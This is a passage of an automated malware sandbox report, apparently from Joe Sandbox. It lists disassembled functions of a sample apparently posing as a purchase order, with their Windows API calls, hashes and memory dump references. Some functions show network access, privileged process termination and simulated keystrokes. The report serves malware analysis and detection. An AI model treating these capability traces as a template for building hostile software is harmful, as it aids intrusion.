                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ClassMessageNameParentSend
                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                          • API String ID: 1290815626-3381328864
                          • Opcode ID: beb3ca3095d45911be63928c569426d3cad0c66e58493e9ffd1915e67993584b
                          • Instruction ID: 14572403d6e4d61442dc01d818c69681692c88f8cda213c1cccd4f896cedfb9b
                          • Opcode Fuzzy Hash: beb3ca3095d45911be63928c569426d3cad0c66e58493e9ffd1915e67993584b
                          • Instruction Fuzzy Hash: 4A112C7768CB17B9F6056620EC07EE6779CCB16724B20001BFB04B50E1FEA9BC417A55
                          Function 00F3CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                          • String ID:
                          • API String ID: 1282221369-0
                          • Opcode ID: b1214ec23b0bd7b390240c916cbf1515526c6bddb0568bd9b14db8b6b4f1f588
                          • Instruction ID: 499e9e59f36b53d64291d29ba9ce3d9017593e7863c4f00ea5ba6efba74c3680
                          • Opcode Fuzzy Hash: b1214ec23b0bd7b390240c916cbf1515526c6bddb0568bd9b14db8b6b4f1f588
                          • Instruction Fuzzy Hash: 0A6134B1D05314AFDB25AFB4AC81B6D7BA6EF05770F04416EF940A7281DB369900F7A0
                          Function 00F950D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00F95186
                          • ShowWindow.USER32(?,00000000), ref: 00F951C7
                          • ShowWindow.USER32(?,00000005,?,00000000), ref: 00F951CD
                          • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00F951D1
                            • Part of subcall function 00F96FBA: DeleteObject.GDI32(00000000), ref: 00F96FE6
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F9520D
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F9521A
                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F9524D
                          • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00F95287
                          • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00F95296
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                          • String ID:
                          • API String ID: 3210457359-0
                          • Opcode ID: 4f413ed3157bc74c500b54e749ac09b6bacd2cc1efae9258fd61a32d9e2b591a
                          • Instruction ID: 673e4fc74bbd1b17fc3121621aa856695fae941623a0296f3aa4c7c7628a5c92
                          • Opcode Fuzzy Hash: 4f413ed3157bc74c500b54e749ac09b6bacd2cc1efae9258fd61a32d9e2b591a
                          • Instruction Fuzzy Hash: 15519D31A44A08BFFF269F64CC4ABD83B65FB05B25F144012F619962E0C376A980FB81
                          Function 00F18B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F56890
                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F568A9
                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F568B9
                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F568D1
                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F568F2
                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F18874,00000000,00000000,00000000,000000FF,00000000), ref: 00F56901
                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F5691E
                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F18874,00000000,00000000,00000000,000000FF,00000000), ref: 00F5692D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                          • String ID:
                          • API String ID: 1268354404-0
                          • Opcode ID: 219a479f5775c2becd59ceb4f8a27118f57007efd3aa9adef42defa130997cdc
                          • Instruction ID: 3665997ab61c2dba44e4f3dd336f431a73e9ed3c8fa2f64cc19966f7d9d2357c
                          • Opcode Fuzzy Hash: 219a479f5775c2becd59ceb4f8a27118f57007efd3aa9adef42defa130997cdc
                          • Instruction Fuzzy Hash: B9518B71A00209EFDB20CF24CC55BAA7BB6FF98761F104519FA16D72A0DB70E991EB50
                          Function 00F7C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F7C182
                          • GetLastError.KERNEL32 ref: 00F7C195
                          • SetEvent.KERNEL32(?), ref: 00F7C1A9
                            • Part of subcall function 00F7C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F7C272
                            • Part of subcall function 00F7C253: GetLastError.KERNEL32 ref: 00F7C322
                            • Part of subcall function 00F7C253: SetEvent.KERNEL32(?), ref: 00F7C336
                            • Part of subcall function 00F7C253: InternetCloseHandle.WININET(00000000), ref: 00F7C341
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                          • String ID:
                          • API String ID: 337547030-0
                          • Opcode ID: 2c9eea7b0a3ed0d9b23392ecc02d1432d7544f58dece9216fcbe06e273561ce0
                          • Instruction ID: 3af6a54b9a0f28bf467c964136ca164996bf000a5dc6170a4b504d11c928f4c0
                          • Opcode Fuzzy Hash: 2c9eea7b0a3ed0d9b23392ecc02d1432d7544f58dece9216fcbe06e273561ce0
                          • Instruction Fuzzy Hash: 5F318B71600605AFDB219FA5DC44A66BBF8FF18310B50842FF95A83621D730E914FBE2
                          Function 00F625A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F63A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F63A57
                            • Part of subcall function 00F63A3D: GetCurrentThreadId.KERNEL32 ref: 00F63A5E
                            • Part of subcall function 00F63A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F625B3), ref: 00F63A65
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F625BD
                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F625DB
                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00F625DF
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F625E9
                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F62601
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00F62605
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F6260F
                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F62623
                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00F62627
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                          • String ID:
                          • API String ID: 2014098862-0
                          • Opcode ID: e30609e5b76d16665fd4a07123da0f3000567d2c1dfd76cb13237541cedf07cf
                          • Instruction ID: 10148c7b361f52244a87b7130d8b21c843387ad90871a76384e7ee624d572aea
                          • Opcode Fuzzy Hash: e30609e5b76d16665fd4a07123da0f3000567d2c1dfd76cb13237541cedf07cf
                          • Instruction Fuzzy Hash: D101D431390614BBFB206769DC8AF593F59DF4EB52F100012F318AF0D1C9F22444EAAA
                          Function 00F61803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00F61449,?,?,00000000), ref: 00F6180C
                          • HeapAlloc.KERNEL32(00000000,?,00F61449,?,?,00000000), ref: 00F61813
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F61449,?,?,00000000), ref: 00F61828
                          • GetCurrentProcess.KERNEL32(?,00000000,?,00F61449,?,?,00000000), ref: 00F61830
                          • DuplicateHandle.KERNEL32(00000000,?,00F61449,?,?,00000000), ref: 00F61833
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F61449,?,?,00000000), ref: 00F61843
                          • GetCurrentProcess.KERNEL32(00F61449,00000000,?,00F61449,?,?,00000000), ref: 00F6184B
                          • DuplicateHandle.KERNEL32(00000000,?,00F61449,?,?,00000000), ref: 00F6184E
                          • CreateThread.KERNEL32(00000000,00000000,00F61874,00000000,00000000,00000000), ref: 00F61868
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                          • String ID:
                          • API String ID: 1957940570-0
                          • Opcode ID: 7d63b7a63fe9bdbbd43bab4b5bc6232fb06bd9a63ca9ca4800ca16f23bbc2460
                          • Instruction ID: dfb7c76102465e874750a720213c0e1c8deab3020be36b6b3b66f2557a08d2f6
                          • Opcode Fuzzy Hash: 7d63b7a63fe9bdbbd43bab4b5bc6232fb06bd9a63ca9ca4800ca16f23bbc2460
                          • Instruction Fuzzy Hash: 2901BBB5640308BFE710ABB5DD4EF6B3BACEB89B11F404412FA05DB1A2CA709840DB74
                          Function 00F8A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F6D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00F6D501
                            • Part of subcall function 00F6D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00F6D50F
                            • Part of subcall function 00F6D4DC: CloseHandle.KERNEL32(00000000), ref: 00F6D5DC
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F8A16D
                          • GetLastError.KERNEL32 ref: 00F8A180
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F8A1B3
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F8A268
                          • GetLastError.KERNEL32(00000000), ref: 00F8A273
                          • CloseHandle.KERNEL32(00000000), ref: 00F8A2C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                          • String ID: SeDebugPrivilege
                          • API String ID: 2533919879-2896544425
                          • Opcode ID: f355f5f720a42cfaeb346c64a8504bbbe21f4089264e695493f7f5af364b05f3
                          • Instruction ID: e221717c0f8bf8a44195366854df47ebeb5d08f52ca0b9b36ebc56d3a8fb367f
                          • Opcode Fuzzy Hash: f355f5f720a42cfaeb346c64a8504bbbe21f4089264e695493f7f5af364b05f3
                          • Instruction Fuzzy Hash: 2E619E716046429FE720EF18C894F55BBE1EF44318F18848DE4668B7A3C776EC45EB92
                          Function 00F93886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F93925
                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00F9393A
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F93954
                          • _wcslen.LIBCMT ref: 00F93999
                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F939C6
                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F939F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$Window_wcslen
                          • String ID: SysListView32
                          • API String ID: 2147712094-78025650
                          • Opcode ID: a5342b126f550b60bba313f88bd9a69fbefa36b424ecbaee7ca483d5ca08974c
                          • Instruction ID: 27b7d1a03555cb59c47f8d9d881b9e8f87f86ba1aa744f7fddfb23d85a902168
                          • Opcode Fuzzy Hash: a5342b126f550b60bba313f88bd9a69fbefa36b424ecbaee7ca483d5ca08974c
                          • Instruction Fuzzy Hash: 08417472A00219ABEF219F64CC45BEA7BA9EF08360F100526F958E7281D7759D94EB90
                          Function 00F6BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F6BCFD
                          • IsMenu.USER32(00000000), ref: 00F6BD1D
                          • CreatePopupMenu.USER32 ref: 00F6BD53
                          • GetMenuItemCount.USER32(01245730), ref: 00F6BDA4
                          • InsertMenuItemW.USER32(01245730,?,00000001,00000030), ref: 00F6BDCC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                          • String ID: 0$2
                          • API String ID: 93392585-3793063076
                          • Opcode ID: 0bd35450757b369e095ced8e975eb4b5c08589de2e25e678e3729751fa5b2e6a
                          • Instruction ID: 6280543ac61a17d1cc84c97129280cf9cfa1a1544cecd6436e5b90a271cc6d64
                          • Opcode Fuzzy Hash: 0bd35450757b369e095ced8e975eb4b5c08589de2e25e678e3729751fa5b2e6a
                          • Instruction Fuzzy Hash: 7A51A170A002099BDF20CFA8D888BAEBBF8BF45324F14425AE451DB291D7749985EB61
                          Function 00F6C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadIconW.USER32(00000000,00007F03), ref: 00F6C913
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: IconLoad
                          • String ID: blank$info$question$stop$warning
                          • API String ID: 2457776203-404129466
                          • Opcode ID: c63710881dbaf990f6fbb021757839ba525e704773511478a2f80581007a247e
                          • Instruction ID: cb755687dc835c02b4e9e48d2ae97efcc33b031cfb6538785d0c943a014bfc9d
                          • Opcode Fuzzy Hash: c63710881dbaf990f6fbb021757839ba525e704773511478a2f80581007a247e
                          • Instruction Fuzzy Hash: 73110D32A89307BAE7059B54AC83EBA7B9CDF15764B10042FF584E6182DBB4AD0076E5
                          Function 00F6ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$LocalTime
                          • String ID:
                          • API String ID: 952045576-0
                          • Opcode ID: f9c6f9025bfe96ae656bdd10d7f3742d60c4d99f271089de8d822676e7fad97e
                          • Instruction ID: de91c7d899d71c0afdd9f303d2c9c61ae41dd4b5e70fd6ed381ca54632f9e436
                          • Opcode Fuzzy Hash: f9c6f9025bfe96ae656bdd10d7f3742d60c4d99f271089de8d822676e7fad97e
                          • Instruction Fuzzy Hash: 1541D466C10228B5CB11EBF4DC8A9CFB7A8AF45310F508466F518E3162FB78E245D3E5
                          Function 00F1F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F5682C,00000004,00000000,00000000), ref: 00F1F953
                          • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F5682C,00000004,00000000,00000000), ref: 00F5F3D1
                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F5682C,00000004,00000000,00000000), ref: 00F5F454
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          • Opcode ID: 5d03362ceaf0c7078a300d3da233aa96e3b3e1c3c3dc3101206d98661dc524c0
                          • Instruction ID: ba05c87f9a37c38d54736d2e2c77941ba20a8615409c579b7f3a6710e48d73d5
                          • Opcode Fuzzy Hash: 5d03362ceaf0c7078a300d3da233aa96e3b3e1c3c3dc3101206d98661dc524c0
                          • Instruction Fuzzy Hash: A7418E32908640BBD734AB39CC887AA7B92BB46330FD8403DE58752560C63198CDFB51
                          Function 00F92D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00F92D1B
                          • GetDC.USER32(00000000), ref: 00F92D23
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F92D2E
                          • ReleaseDC.USER32(00000000,00000000), ref: 00F92D3A
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F92D76
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F92D87
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F95A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00F92DC2
                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F92DE1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                          • String ID:
                          • API String ID: 3864802216-0
                          • Opcode ID: 2652a4f73a0c7df84ac0c876387ee6fd7bfbc3464fe9db3aab9e5cc931e50ef0
                          • Instruction ID: eb4c69ae2fc8ab3863ba1a48ffda98285eb17382866f1e7b323a6d1facdb3ec4
                          • Opcode Fuzzy Hash: 2652a4f73a0c7df84ac0c876387ee6fd7bfbc3464fe9db3aab9e5cc931e50ef0
                          • Instruction Fuzzy Hash: 1D316B72201214BBEF218F548C8AFEB3BA9EF09725F044056FE089A291C6759C51DBA4
                          Function 00F65622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _memcmp
                          • String ID:
                          • API String ID: 2931989736-0
                          • Opcode ID: 696702909648c218211d0fe10d9d4d5a8e8d6e809bbbca5ce5ef55e71e0f1374
                          • Instruction ID: aac7f43bc837b07fe0d0cd91aa03bc08aa00489d7f06c2e1d9d6fe098569c3e1
                          • Opcode Fuzzy Hash: 696702909648c218211d0fe10d9d4d5a8e8d6e809bbbca5ce5ef55e71e0f1374
                          • Instruction Fuzzy Hash: AC21CC62A4091977E6149510DD82FFA335DBF30BA4F444020FD05FA541F726EE24F6AA
                          Function 00F84FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
